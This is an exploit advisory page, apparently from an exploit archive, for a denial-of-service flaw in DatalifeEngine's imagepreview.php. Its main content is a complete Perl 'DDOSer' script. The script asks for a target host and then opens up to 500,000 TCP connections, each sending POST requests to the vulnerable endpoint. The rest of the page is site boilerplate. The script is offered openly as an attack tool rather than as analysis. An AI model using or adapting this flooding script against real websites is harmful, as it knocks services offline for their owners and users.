DatalifeEngine imagepreview.php Denial Of Service Vulnerability

2012.06.17
Credit: Am!r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl # DatalifeEngine 'imagepreview.php' Denial Of Service Vulnerability # Software Link : http://www.datalifeengine.ir/ # Home : http://Www.IrIsT.Ir/forum # Greetz to all members of IrIsT.Ir & Iranian Team use IO::Socket; print "###########################################################################\n"; print "# #\n"; print "# Islamic Republic Of Iran Security Team - Datalife Engine DDOSer #\n"; print "# Home : Www.IrIsT.Ir & Www.IrIsT.Ir/forum #\n"; print "# Greetz to all members of IrIsT & Iranian Team #\n"; print "# #\n"; print "###########################################################################\n"; print "Datalife DDOSer\n"; print "Site : "; $HOST = <STDIN>; chop ($HOST); $i=0; while($i<500000){ $i++; $lower=1; $upper=200000; $random = int(rand( $upper-$lower+1 ) ) + $lower; $FILE = "image.jpg"; $LENGTH = length $FILE; $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "*"; print $get1 "POST /engine/modules/imagepreview.php HTTP/1.1\n"; print $get1 "Host: ".$HOST. "\n"; print $get1 $FILE; syswrite STDOUT, "*"; }

References:

http://www.datalifeengine.ir/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top